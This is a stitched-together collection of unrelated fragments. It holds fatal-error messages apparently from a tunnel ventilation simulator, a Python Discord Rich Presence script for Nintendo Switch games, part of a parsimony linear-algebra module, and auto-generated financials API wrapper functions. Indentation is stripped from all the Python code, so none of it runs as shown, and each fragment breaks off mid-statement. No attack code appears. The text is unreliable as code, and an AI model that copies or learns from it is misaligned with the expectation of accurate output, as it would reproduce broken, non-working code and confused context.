THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 201 ********************************************************************************
THE DRAG COEFFICIENT WEIGHTED TOTAL TRUCK AREA IS NEGATIVE OR GREATER THAN 500 SQFT.
*ERROR* TYPE 202 ********************************************************************************
THE NUMBER OF LOOPS PASSING THROUGH BRANCHED JUNCTIONS PLUS THE NUMBER OF TRAINS THAT MAY PASS THROUGH
BRANCHED JUNCTIONS IS TOO GREAT.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 203 ********************************************************************************
AN IMPROPER SECTION HAS BEEN LINKED TO THIS BRANCHED JUNCTION.
THIS FATAL ERROR PREVENTS FURTHER INTERPRETATION OF THIS SYSTEM INPUT FILE.
SOME FATAL ERRORS MAY BE CORRECTED BY EITHER CHANGING THE NUMBER OF ITEMS INPUT OR CHANGING THE PROGRAM
ARRAY SIZES. PLEASE SEE DISCUSSIONS IN BOTH THE 'ERROR MESSAGES' PORTION OF THE USER'S MANUAL AND THE
PORTION OF THE PROGRAMMER'S GUIDE IN THE PROGRAMMER'S MANUAL DEALING WITH ARRAY SIZE ADJUSTMENT.
*ERROR* TYPE 204 ********************************************************************************
THE NUMBER OF LINE SEGMENTS AND VENTILATION SHAFTS IN THIS ENVIRONMENTAL CONTROL ZONE
IS | |
#+= imports =+#
import sys
import os
import time
if sys.version_info < (3, 8):
os.system('cls' if os.name == 'nt' else 'clear')
print('[Warning] Your version of Python is lower than the recommended Python version')
print('This program officially supports Python version 3.8 and higher')
print(sys.version_info)
vInput = input('Do you wish to continue (Y/N)? ')
if vInput.lower() not in ['yes', 'y']:
sys.exit(0)
import json
import webbrowser
import ctypes
import random
try: # only try for the modules that need to be installed
import requests
from pypresence import Presence
from colorama import Fore, init
init()
os.system('cls' if os.name == 'nt' else 'clear')
except ImportError as missingmod:
os.system('cls' if os.name == 'nt' else 'clear')
print(f'[Error] Module \'{missingmod.name}\' is missing')
module = input('Would you like to install all of the required modules? ')
if module in ['yes', 'y']:
print('[Info] Installing now...')
try:
os.system('pip install --upgrade pip')
os.system('pip install pypresence')
os.system('pip install requests')
os.system('pip install colorama')
print('\n[Info] Successfully installed all of the required modules! Please restart Switchence')
time.sleep(600)
sys.exit(0)
except Exception as error:
print('Error in installing required modules automatically. Please install them manually. Error below')
print(error)
time.sleep(600)
sys.exit(0)
else:
print('[Info] Installation of required modules cancelled')
time.sleep(600)
sys.exit()
initializeTime = time.time()
#+= important functions =+#
class log:
def __init__(self, text, color):
self.text = text
self.color = color
def error(text: str):
changeWindowTitle('Error')
clear()
print(f'{Fore.LIGHTRED_EX}[Error]{Fore.RESET} {text}')
print('Please report this error on the Switchence GitHub issue page if this error happens consistently')
time.sleep(5)
webbrowser.open('https://github.com/Aethese/Switchence/issues/', new=2, autoraise=True)
time.sleep(600)
sys.exit(1)
def info(text: str, close): # second param is for if i want switchence to close after printing info
changeWindowTitle('Info')
print(f'{Fore.LIGHTGREEN_EX}[Info]{Fore.RESET} {text}')
if close:
clear()
print(f'{Fore.LIGHTGREEN_EX}[Info]{Fore.RESET} {text}')
print('This program will now close in 10 minutes')
time.sleep(600)
sys.exit(0)
def loading(text: str, color): # color is the color of the loading text
if color == 'green':
color = Fore.LIGHTGREEN_EX
elif color == 'yellow':
color = Fore.LIGHTYELLOW_EX
else:
color = Fore.LIGHTRED_EX
print(f'{Fore.LIGHTCYAN_EX}[Loading] {color}{text}{Fore.RESET}')
class config:
def update(self, changeto): # self = setting being changed
with open('config.json', 'r') as jfile:
jFile = json.load(jfile)
for i in jFile['config']:
i[self] = changeto
with open('config.json', 'w') as jfile:
json.dump(jFile, jfile, indent=4)
@staticmethod
def create(swcode):
try: # fucking global vars
global sw, version, updatenotifier, configfname, showbutton, autoupdate, favorites
configjson = {'config': [{
'sw-code': swcode,
'version': '1.9.3',
'update-notifier': True,
'fname': False,
'show-button': True,
'auto-update': False,
'favorites': []
}]}
log.loading('Got settings to save, saving them...', 'yellow')
with open('config.json', 'w') as jsonfile:
json.dump(configjson, jsonfile, indent=4)
with open('config.json', 'r') as jsonfile: # actually get the info lol
jsonFile = json.load(jsonfile)
for details in jsonFile['config']:
sw = details['sw-code']
version = details['version']
updatenotifier = details['update-notifier']
configfname = details['fname']
showbutton = details['show-button']
autoupdate = details['auto-update']
favorites = details['favorites']
log.loading('Config file settings set!', 'green')
except Exception as error:
log.error(f'Couldn\'t create config settings | {error}')
log.loading('Loading initial functions...', 'yellow')
def clear():
os.system('cls' if os.name == 'nt' else 'clear') # *supposedly* multiplatform supported clear
clear()
def changeWindowTitle(title):
if os.name == 'nt': # hopefully multiplatform support
ctypes.windll.kernel32.SetConsoleTitleW(f'Switchence | {title}')
changeWindowTitle('Loading...')
def reopen(path):
fileName = os.path.basename(__file__)
if not path:
return fileName # just to get path
if os.path.isfile('Switchence.exe'): # TODO: add support for if they changed file name lol
sys.exit(0) # TODO: actually reopen exe file lol
elif '.py' in fileName: # even exe files are considered .py files :/
os.system(f'python3 {fileName}')
else:
sys.exit(1)
def updateProgram(onlinever):
changeWindowTitle(f'Updating to version {onlinever}')
log.info(f'Updating to version {onlinever}...', False)
currentFile = reopen(False)
if os.path.isfile('Switchence.exe'):
config.update('auto-update', False) # fixes infinite error loop lol
log.info('The exe file does not currently support auto updating', True)
currentOnlineVersion = requests.get('https://raw.githubusercontent.com/Aethese/Switchence/main/main.py')
if currentOnlineVersion.status_code != 200: # request to get raw code was not successful
log.error(f'Status code is not 200, it is {currentOnlineVersion.status_code}, so the program will not update')
onlineVersionBinary = currentOnlineVersion.content # get binary version of raw code
with open(currentFile, 'wb') as file: # thanks to https://stackoverflow.com/users/13155625/dawid-januszkiewicz
file.write(onlineVersionBinary) # for getting this to work!
config.update('version', onlinever)
changeWindowTitle(f'Updated to version {onlinever}')
ro = input('Would you like to reopen Switchence? ')
if ro in ['yes', 'y']:
reopen(True)
log.info(f'Finished updating to version {onlinever}', True)
#+= variables =+#
# just pre defining variables
beta = False # if current build is a test build
version = None
oVersion = None # online version
sw = None
updatenotifier = None
configfname = None
showbutton = None
autoupdate = None
gamenames = []
gamefnames = []
chosenOne = ''
updateAvailable = False
announcement = None
favorites = None
tips = None
#+= loading config file =+#
log.loading('Checking for config file...', 'yellow')
if os.path.isfile('config.json'):
log.loading('Found config file, attempting to read contents...', 'yellow')
try:
with open('config.json', 'r') as jsonfile:
jsonFile = json.load(jsonfile)
for details in jsonFile['config']:
sw = details['sw-code']
version = details['version']
updatenotifier = details['update-notifier']
configfname = details['fname']
showbutton = details['show-button']
autoupdate = details['auto-update']
favorites = details['favorites']
log.loading('Loaded config settings!', 'green')
except Exception: # if some settings are missing, recreate the file while saving some settings
if sw is None: # in case an empty config file is found
sw = ''
if version is None:
version = '1.9.3'
log.loading('Missing config settings found, creating them...', 'red')
log.loading('This means some settings will be reset to default', 'red')
config.create(sw)
elif os.path.isfile('config.json') is False:
log.loading('Config file not found, attempting to create one...', 'yellow')
sw = '' # sw var is needed in function below, so it needs to be pre defined
config.create(sw)
#+= game list =+#
log.loading('Attempting to load game list...', 'yellow')
gamejson = requests.get('https://raw.githubusercontent.com/Aethese/Switchence/main/games.json') # auto update game list :)
if gamejson.status_code != 200:
log.error(f'Failed to get game list with status code {gamejson.status_code}')
gamejsontext = gamejson.text
games = json.loads(gamejsontext)
oVersion = games['version']
announcement = games['announcement']
tips = games['tips']
log.loading('Game list loaded!', 'green')
log.loading('Attempting to read game list info...', 'yellow')
for details in games['games']:
gamenames.append(details['name'])
gamefnames.append(details['fname'])
log.loading('Successfully read game list info!', 'green')
#+= checking version =+#
log.loading('Checking file version...', 'yellow')
if version in [None, '']: # checks your version
log.loading('File version not found, attempting to create...', 'red')
config.update('version', oVersion)
log.loading('Successfully created file version!', 'green')
elif version != oVersion:
updateAvailable = True
#+= rpc =+#
log.loading('Attempting to start Rich Presence...', 'yellow')
RPC = Presence('803309090696724554')
RPC.connect()
log.loading('Successfully started Rich Presence!', 'green')
#+= some more important functions =+#
def changePresence(swstatus, gameimg, gamefname):
start_time = time.time()
string = time.strftime('%H:%M', time.localtime())
if beta: # set small image to indicate build ran by user is a beta build or not
smallText = 'Switchence Beta'
smallImg = 'gold_icon'
else:
smallText = f'Switchence v{version}'
smallImg = 'switch_png'
if swstatus is False:
if showbutton:
RPC.update(large_image=gameimg, large_text=gamefname, small_image=smallImg, small_text=smallText, details=gamefname,
buttons=[{'label': 'Get this program here', 'url': 'https://github.com/Aethese/Switchence/releases'}], start=start_time)
else:
RPC.update(large_image=gameimg, large_text=gamefname, small_image=smallImg, small_text=smallText, details=gamefname, start=start_time)
print(f'Set game to {Fore.LIGHTGREEN_EX}{gamefname}{Fore.RESET} at {string}')
else:
if showbutton:
RPC.update(large_image=gameimg, large_text=gamefname, small_image=smallImg, small_text=smallText, details=gamefname,
state=f'SW-{sw}', buttons=[{'label': 'Get this program here', 'url': 'https://github.com/Aethese/Switchence/releases'}], start=start_time)
else:
RPC.update(large_image=gameimg, large_text=gamefname, small_image=smallImg, small_text=smallText, details=gamefname, state=f'SW-{sw}', start=start_time)
print(f'Set game to {Fore.LIGHTGREEN_EX}{gamefname}{Fore.RESET} at {string} with friend code \'SW-{sw}\' showing')
changeWindowTitle(f'Playing {gamefname}')
def changeUpdateNotifier():
picked = input('\nWhat setting do you want the Update Notifier to be set to, on or off? ')
picked = picked.lower()
if picked in ['on', 'true', 't']: # why do you want this on tbh
config.update('update-notifier', True)
log.info(f'Update notifier set to {Fore.LIGHTGREEN_EX}TRUE{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
elif picked in ['off', 'off', 'f']:
config.update('update-notifier', False)
log.info(f'Update notifier set to {Fore.LIGHTRED_EX}FALSE{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
def changeFNameSetting():
length = 'short' if configfname is False else 'full'
print(f'\nYour current setting is set to: {Fore.LIGHTGREEN_EX}{length}{Fore.RESET}')
k = input('What do you want to change it setting to? \'Full\' for full game names or \'short\' for shortened game names ')
k = k.lower()
if k in ['full', 'f']:
config.update('fname', True)
log.info(f'Set game name to {Fore.LIGHTGREEN_EX}Full{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
elif k in ['short', 's']:
config.update('fname', False)
log.info(f'Set game name to {Fore.LIGHTGREEN_EX}Short{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
def changeAutoUpdate():
print(f'\nYour current Auto Update setting is set to {Fore.LIGHTGREEN_EX}{autoupdate}{Fore.RESET}')
ask = input('What would you like to change it to? On or off? ')
ask = ask.lower()
if ask == 'on':
config.update('auto-update', True)
log.info(f'Set Auto Update setting to {Fore.LIGHTGREEN_EX}True{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
elif ask == 'off':
config.update('auto-update', False)
log.info(f'Set Auto Update setting to {Fore.LIGHTRED_EX}False{Fore.RESET}. Switchence will now restart shortly...', False)
time.sleep(3)
reopen(True)
else:
log.error('Keeping auto update setting the same since you did not answer correctly')
def addFavorite():
favask = input('Would you like to add or remove a favorite? ')
if favask in ['remove', 'r']:
if not favorites:
log.info('Your favorite list is currently empty', True)
rask = input('What game would you like to remove from your favorites? ')
if rask not in favorites:
log.info(f'{rask} is currently not in your favorite list', True)
favorites.remove(rask)
config.update('favorites', favorites)
log.info(f'Successfully removed {rask} from your favorite list', True)
else:
addask = input('What game would you like to add to your favorites? ')
favorites.append(addask)
config.update('favorites', favorites)
log.info(f'Successfully added {addask} to your favorite list', True)
def form():
log.info('Opening the form...', False)
webbrowser.open('https://forms.gle/ofCZ8QXQYxPvTcDE7', new=2, autoraise=True)
log.info('Form is now open! Thanks for being willing to fill out the form!', True)
def shortcut(game: int, favs) -> int:
for i in range(len(favs)):
if i + 1 == game:
return favs[i]
log.error('You don\'t have that many favorites in your favorite list. Use the \'shortcut\' command to figure out how shortcuts work')
#+= looking for game status before picking a game =+#
log.loading('Attempting to set looking for game status...', 'yellow')
startTime = time.time()
if showbutton:
RPC.update(large_image='switch_png', large_text='Searching for a game', details='Searching for a game',
buttons=[{'label': 'Get this program here', 'url': 'https://github.com/Aethese/Switchence/releases'}], start=startTime)
elif showbutton is False:
RPC.update(large_image='switch_png', large_text='Searching for a game', details='Searching for a game', start=startTime)
log.loading('Successfully set looking for game status!', 'green')
#+= home page =+#
changeWindowTitle('Picking a game')
clear()
print('''
.d8888b. d8b 888 888
d88P Y88b Y8P 888 888
Y88b. 888 888
"Y888b. 888 888 888 888 888888 .d8888b 88888b. .d88b. 88888b. .d8888b .d88b.
"Y88b. 888 888 888 888 888 d88P" 888 "88b d8P Y8b 888 "88b d88P" d8P Y8b
"888 888 | |
<filename>parsimony/utils/linalgs.py
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 23 19:15:22 2014
Copyright (c) 2013-2014, CEA/DSV/I2BM/Neurospin. All rights reserved.
@author: <NAME>, <NAME>
@email: <EMAIL>, <EMAIL>
@license: BSD 3-clause.
"""
from six import with_metaclass
import abc
import numpy as np
import scipy.sparse as sparse
try:
from . import consts
except:
from parsimony.utils import consts
__all__ = ["MultipartArray", "LinearOperatorNesterov"]
class MultipartArray(object):
def __init__(self, parts, vertical=True):
self.parts = list(parts)
self.vertical = vertical
self.common_dim = 1 if vertical else 0
self.shape = [0, 0]
self.shape[self.common_dim] = self.parts[0].shape[self.common_dim]
self.multipart_shape = []
for i in range(len(self.parts)):
if len(self.parts[i].shape) != 2:
raise ValueError("MultipartArray is only defined for 2D "
"arrays")
if not self.parts[0].shape[self.common_dim] \
== self.parts[i].shape[self.common_dim]:
raise ValueError("Input vectors must have a common dimension")
self.multipart_shape.append(
self.parts[i].shape[1 - self.common_dim])
self.shape[1 - self.common_dim] += self.multipart_shape[-1]
self.shape = tuple(self.shape)
self.multipart_shape = tuple(self.multipart_shape)
def get_parts(self):
return self.parts
def toarray(self):
if self.vertical:
return np.vstack(self.parts)
else:
return np.hstack(self.parts)
class __ops(object):
add = 0
sub = 1
mul = 2
div = 3
def __iop(self, other, op):
if np.isscalar(other):
for i in range(len(self.parts)):
if op == self.__ops.add:
self.parts[i] += other
elif op == self.__ops.sub:
self.parts[i] -= other
elif op == self.__ops.mul:
self.parts[i] *= other
elif op == self.__ops.div:
self.parts[i] *= 1.0 / other
else:
raise ValueError("Operator not yet implemented!")
elif isinstance(other, MultipartArray):
other_parts = other.get_parts()
for i in range(len(self.parts)):
if op == self.__ops.add:
self.parts[i] += other_parts[i]
elif op == self.__ops.sub:
self.parts[i] -= other_parts[i]
elif op == self.__ops.mul:
self.parts[i] *= other_parts[i]
else:
raise ValueError("Operator not yet implemented!")
elif self.shape == other.shape:
start = 0
end = 0
for i in range(len(self.parts)):
if self.vertical:
end += self.parts[i].shape[0]
if op == self.__ops.add:
self.parts[i] += other[start:end, :]
elif op == self.__ops.sub:
self.parts[i] -= other[start:end, :]
elif op == self.__ops.mul:
self.parts[i] *= other[start:end, :]
else:
raise ValueError("Operator not yet implemented!")
else:
end += self.parts[i].shape[1]
if op == self.__ops.add:
self.parts[i] += other[:, start:end]
elif op == self.__ops.sub:
self.parts[i] -= other[:, start:end]
elif op == self.__ops.mul:
self.parts[i] *= other[:, start:end]
else:
raise ValueError("Operator not yet implemented!")
start = end
else:
raise ValueError("Unknown type")
return self
def __iadd__(self, other):
return self.__iop(other, self.__ops.add)
def __isub__(self, other):
return self.__iop(other, self.__ops.sub)
def __imul__(self, other):
return self.__iop(other, self.__ops.mul)
def __idiv__(self, other):
if not np.isscalar(other):
raise ValueError("Operator not yet implemented for type!")
return self.__iop(other, self.__ops.div)
def __itruediv__(self, other):
if not np.isscalar(other):
raise ValueError("Operator not yet implemented for type!")
return self.__iop(float(other), self.__ops.div)
def __op(self, other, op):
new_parts = [0] * len(self.parts)
if np.isscalar(other):
for i in range(len(self.parts)):
if op == self.__ops.add:
new_parts[i] = self.parts[i] + other
elif op == self.__ops.sub:
new_parts[i] = self.parts[i] - other
elif op == self.__ops.mul:
new_parts[i] = self.parts[i] * other
elif op == self.__ops.div:
new_parts[i] = self.parts[i] * (1.0 / other)
else:
raise ValueError("Operator not yet implemented!")
elif isinstance(other, MultipartArray):
other_parts = other.get_parts()
for i in range(len(self.parts)):
if op == self.__ops.add:
new_parts[i] = self.parts[i] + other_parts[i]
elif op == self.__ops.sub:
new_parts[i] = self.parts[i] - other_parts[i]
elif op == self.__ops.mul:
new_parts[i] = self.parts[i] * other_parts[i]
else:
raise ValueError("Operator not yet implemented!")
elif self.shape == other.shape:
start = 0
end = 0
for i in range(len(self.parts)):
if self.vertical:
end += self.parts[i].shape[0]
if op == self.__ops.add:
new_parts[i] = self.parts[i] + other[start:end, :]
elif op == self.__ops.sub:
new_parts[i] = self.parts[i] - other[start:end, :]
elif op == self.__ops.mul:
new_parts[i] = self.parts[i] * other[start:end, :]
else:
raise ValueError("Operator not yet implemented!")
else:
end += self.parts[i].shape[1]
if op == self.__ops.add:
new_parts[i] = self.parts[i] + other[:, start:end]
elif op == self.__ops.sub:
new_parts[i] = self.parts[i] - other[:, start:end]
elif op == self.__ops.mul:
new_parts[i] = self.parts[i] * other[:, start:end]
else:
raise ValueError("Operator not yet implemented!")
start = end
else:
raise ValueError("Unknown type")
return MultipartArray(new_parts, vertical=self.vertical)
def __add__(self, other):
return self.__op(other, self.__ops.add)
def __sub__(self, other):
return self.__op(other, self.__ops.sub)
def __mul__(self, other):
return self.__op(other, self.__ops.mul)
def __div__(self, other):
if not np.isscalar(other):
raise ValueError("Operator not yet implemented for type!")
return self.__op(other, self.__ops.div)
def __truediv__(self, other):
if not np.isscalar(other):
raise ValueError("Operator not yet implemented for type!")
return self.__op(float(other), self.__ops.div)
def dot(self, other):
if self.vertical:
v = [0] * len(self.parts)
for i in range(len(self.parts)):
v[i] = self.parts[i].dot(other)
v = MultipartArray(v, vertical=True)
else:
v = np.zeros((self.shape[0], 1))
if isinstance(other, MultipartArray):
other_parts = other.get_parts()
for i in range(len(self.parts)):
v += self.parts[i].dot(other_parts[i])
elif self.shape[1] == other.shape[0]:
start = 0
end = 0
for i in range(len(self.parts)):
end += self.parts[i].shape[1]
v += self.parts[i].dot(other[start:end, :])
start = end
else:
raise ValueError("Type or shape unknown")
return v
def transpose(self):
new_parts = [0] * len(self.parts)
for i in range(len(self.parts)):
new_parts[i] = self.parts[i].transpose()
vertical = not self.vertical
return MultipartArray(new_parts, vertical=vertical)
def _get_T(self):
return self.transpose()
def _set_T(self, value):
raise AttributeError("attribute 'T' of 'MultipartArray' objects "
"is not writable")
def _del_T(self):
raise AttributeError("attribute 'T' of 'MultipartArray' objects "
"is not writable")
T = property(_get_T, _set_T, _del_T, 'Transpose of the array.')
def copy(self):
new_parts = [0] * len(self.parts)
for i in range(len(self.parts)):
new_parts[i] = self.parts[i].copy()
return MultipartArray(new_parts, vertical=self.vertical)
def __str__(self):
string = "["
if self.vertical:
for k in range(len(self.parts)):
for i in range(self.parts[k].shape[0]):
if i > 0 or k > 0:
string += ' '
string += str(self.parts[k][i, :])
if k < len(self.parts) - 1 \
or i < self.parts[k].shape[0] - 1:
string += '\n'
if k < len(self.parts) - 1:
string += ' '
string += '-' * (len(str(self.parts[k][i, :])) - 3)
string += "\n"
else:
for i in range(self.parts[0].shape[0]):
for k in range(len(self.parts)):
if k == 0 and i > 0:
string += ' '
string += str(self.parts[k][i, :])
if i < self.parts[len(self.parts) - 1].shape[0] - 1:
string += '\n'
string += "]"
return string
def __repr__(self):
string = "MultipartArray(\n" + str(self.parts)
if self.vertical:
string += ")"
else:
string += ",\nvertical=" + str(self.vertical) + ")"
return string
class Solver(with_metaclass(abc.ABCMeta, object)):
def solve(A, b, eps=consts.TOLERANCE, max_iter=consts.MAX_ITER):
"""Solves a linear system on the form
A.x = b,
for x.
Parameters
----------
A : A matrix with shape n-by-p. The coefficient matrix.
b : Numpy array, n-by-1. The right-hand-side vector.
"""
raise NotImplementedError('Abstract method "solve" must be '
'specialised!')
class SparseSolver(Solver):
def solve(self, A, b, **kwargs):
"""Solves linear systems on the form
A.x = d,
for x.
Parameters
----------
A : A sparse matrix with shape n-by-p. The coefficient matrix.
b : Numpy array, n-by-1. The right-hand-side vector.
Examples
--------
>>> import numpy as np
>>> import scipy.sparse as sparse
>>> import parsimony.utils.linalgs as linalgs
>>> np.random.seed(42)
>>>
>>> n = 10
>>> a = np.random.rand(n); a[-1] = 0.0
>>> b = np.random.rand(n)
>>> c = np.random.rand(n); c[0] = 0.0
>>> A_ = np.random.rand(n, n)
>>> A_[A_ < 0.5] = 0.0
>>> A = sparse.csr_matrix(A_)
>>> d = np.random.rand(n, 1)
>>>
>>> solver = linalgs.SparseSolver()
>>> x = solver.solve(A, d)
>>> x_ = np.linalg.solve(A.toarray(), d)
>>> np.linalg.norm(x - x_) < 5e-15
True
>>>
>>> import time
>>> n = 100
>>> a = np.random.rand(n); a[-1] = 0.0
>>> b = np.random.rand(n)
>>> c = np.random.rand(n); c[0] = 0.0
>>> A_ = np.random.rand(n, n)
>>> A_[A_ < 0.5] = 0.0
>>> A = sparse.csr_matrix(A_)
>>> d = np.random.rand(n, 1)
>>>
>>> t = time.time()
>>> x = solver.solve(A, d)
>>> print "Time:", time.time() - t # doctest: +SKIP
>>>
>>> t = time.time()
>>> x_ = np.linalg.solve(A.toarray(), d)
>>> print "Time:", time.time() - t # doctest: +SKIP
>>> np.linalg.norm(x - x_) < 5e-13
True
>>>
>>> n = 1000
>>> a = np.random.rand(n); a[-1] = 0.0
>>> b = np.random.rand(n)
>>> c = np.random.rand(n); c[0] = 0.0
>>> A_ = np.random.rand(n, n)
>>> A_[A_ < 0.5] = 0.0
>>> A = sparse.csr_matrix(A_)
>>> d = np.random.rand(n, 1)
>>>
>>> t = time.time()
>>> x = solver.solve(A, d)
>>> print "Time:", time.time() - t # doctest: +SKIP
>>>
>>> t = time.time()
>>> x_ = np.linalg.solve(A.toarray(), d)
>>> print "Time:", time.time() - t # doctest: +SKIP
>>>
>>> np.linalg.norm(x - x_) < 5e-11
True
"""
n, p = A.shape
x = sparse.linalg.spsolve(A, b)
return x.reshape((n, 1))
class TridiagonalSolver(Solver):
def solve(self, A, d, **kwargs):
"""Solves linear systems with a tridiagonal coefficient | |
financials_financial_company_item_update_item_category(client,
company_id,
item_id,
id_=None,
code=None,
display_name=None,
last_modified_date_time=None):
body = {}
body['id'] = id_
body['code'] = code
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
return client.update_item_category(company_id=company_id,
item_id=item_id,
body=body)
def financials_financial_company_item_update_picture(client,
company_id,
item_id,
picture_id,
content_type,
id_=None,
content=None,
height=None,
width=None):
body = {}
body['id'] = id_
body['content'] = content
body['content_type'] = content_type
body['height'] = height
body['width'] = width
return client.update_picture(company_id=company_id,
item_id=item_id,
picture_id=picture_id,
body=body)
def financials_financial_company_journal_line_delete_account(client,
company_id,
journal_line_id,
if_match=None):
return client.delete_account(company_id=company_id,
journal_line_id=journal_line_id,
if_match=if_match)
def financials_financial_company_journal_line_show_account(client,
company_id,
journal_line_id,
select=None,
expand=None):
return client.get_account(company_id=company_id,
journal_line_id=journal_line_id,
select=select,
expand=expand)
def financials_financial_company_journal_line_update_account(client,
company_id,
journal_line_id,
id_=None,
blocked=None,
category=None,
display_name=None,
last_modified_date_time=None,
number=None,
sub_category=None):
body = {}
body['id'] = id_
body['blocked'] = blocked
body['category'] = category
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['sub_category'] = sub_category
return client.update_account(company_id=company_id,
journal_line_id=journal_line_id,
body=body)
def financials_financial_company_journal_create_journal_line(client,
company_id,
journal_id,
id_=None,
account_id=None,
account_number=None,
amount=None,
comment=None,
description=None,
document_number=None,
external_document_number=None,
journal_display_name=None,
last_modified_date_time=None,
line_number=None,
posting_date=None,
account=None):
body = {}
body['id'] = id_
body['account_id'] = account_id
body['account_number'] = account_number
body['amount'] = amount
body['comment'] = comment
body['description'] = description
body['document_number'] = document_number
body['external_document_number'] = external_document_number
body['journal_display_name'] = journal_display_name
body['last_modified_date_time'] = last_modified_date_time
body['line_number'] = line_number
body['posting_date'] = posting_date
body['account'] = account
return client.create_journal_lines(company_id=company_id,
journal_id=journal_id,
body=body)
def financials_financial_company_journal_delete_account(client,
company_id,
journal_id,
if_match=None):
return client.delete_account(company_id=company_id,
journal_id=journal_id,
if_match=if_match)
def financials_financial_company_journal_delete_journal_line(client,
company_id,
journal_id,
journal_line_id,
if_match=None):
return client.delete_journal_lines(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
if_match=if_match)
def financials_financial_company_journal_list_journal_line(client,
company_id,
journal_id,
orderby=None,
select=None,
expand=None):
return client.list_journal_lines(company_id=company_id,
journal_id=journal_id,
orderby=orderby,
select=select,
expand=expand)
def financials_financial_company_journal_post(client,
company_id,
journal_id):
return client.post(company_id=company_id,
journal_id=journal_id)
def financials_financial_company_journal_show_account(client,
company_id,
journal_id,
select=None,
expand=None):
return client.get_account(company_id=company_id,
journal_id=journal_id,
select=select,
expand=expand)
def financials_financial_company_journal_show_journal_line(client,
company_id,
journal_id,
journal_line_id,
select=None,
expand=None):
return client.get_journal_lines(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
select=select,
expand=expand)
def financials_financial_company_journal_update_account(client,
company_id,
journal_id,
id_=None,
blocked=None,
category=None,
display_name=None,
last_modified_date_time=None,
number=None,
sub_category=None):
body = {}
body['id'] = id_
body['blocked'] = blocked
body['category'] = category
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['sub_category'] = sub_category
return client.update_account(company_id=company_id,
journal_id=journal_id,
body=body)
def financials_financial_company_journal_update_journal_line(client,
company_id,
journal_id,
journal_line_id,
id_=None,
account_id=None,
account_number=None,
amount=None,
comment=None,
description=None,
document_number=None,
external_document_number=None,
journal_display_name=None,
last_modified_date_time=None,
line_number=None,
posting_date=None,
account=None):
body = {}
body['id'] = id_
body['account_id'] = account_id
body['account_number'] = account_number
body['amount'] = amount
body['comment'] = comment
body['description'] = description
body['document_number'] = document_number
body['external_document_number'] = external_document_number
body['journal_display_name'] = journal_display_name
body['last_modified_date_time'] = last_modified_date_time
body['line_number'] = line_number
body['posting_date'] = posting_date
body['account'] = account
return client.update_journal_lines(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
body=body)
def financials_financial_company_journal_journal_line_delete_account(client,
company_id,
journal_id,
journal_line_id,
if_match=None):
return client.delete_account(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
if_match=if_match)
def financials_financial_company_journal_journal_line_show_account(client,
company_id,
journal_id,
journal_line_id,
select=None,
expand=None):
return client.get_account(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
select=select,
expand=expand)
def financials_financial_company_journal_journal_line_update_account(client,
company_id,
journal_id,
journal_line_id,
id_=None,
blocked=None,
category=None,
display_name=None,
last_modified_date_time=None,
number=None,
sub_category=None):
body = {}
body['id'] = id_
body['blocked'] = blocked
body['category'] = category
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['sub_category'] = sub_category
return client.update_account(company_id=company_id,
journal_id=journal_id,
journal_line_id=journal_line_id,
body=body)
def financials_financial_company_purchase_invoice_line_delete_account(client,
company_id,
purchase_invoice_line_id,
if_match=None):
return client.delete_account(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_line_delete_item(client,
company_id,
purchase_invoice_line_id,
if_match=None):
return client.delete_item(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
if_match=if_match)
def financials_financial_company_purchase_invoice_line_show_account(client,
company_id,
purchase_invoice_line_id,
select=None,
expand=None):
return client.get_account(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_line_show_item(client,
company_id,
purchase_invoice_line_id,
select=None,
expand=None):
return client.get_item(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
select=select,
expand=expand)
def financials_financial_company_purchase_invoice_line_update_account(client,
company_id,
purchase_invoice_line_id,
id_=None,
blocked=None,
category=None,
display_name=None,
last_modified_date_time=None,
number=None,
sub_category=None):
body = {}
body['id'] = id_
body['blocked'] = blocked
body['category'] = category
body['display_name'] = display_name
body['last_modified_date_time'] = last_modified_date_time
body['number'] = number
body['sub_category'] = sub_category
return client.update_account(company_id=company_id,
purchase_invoice_line_id=purchase_invoice_line_id,
body=body)
def financials_financial_company_purchase_invoice_line_update_item(client,
company_id,
purchase_invoice_line_id,
id_=None,
base_unit_of_measure_id=None,
blocked=None,
display_name=None,
gtin=None,
inventory=None,
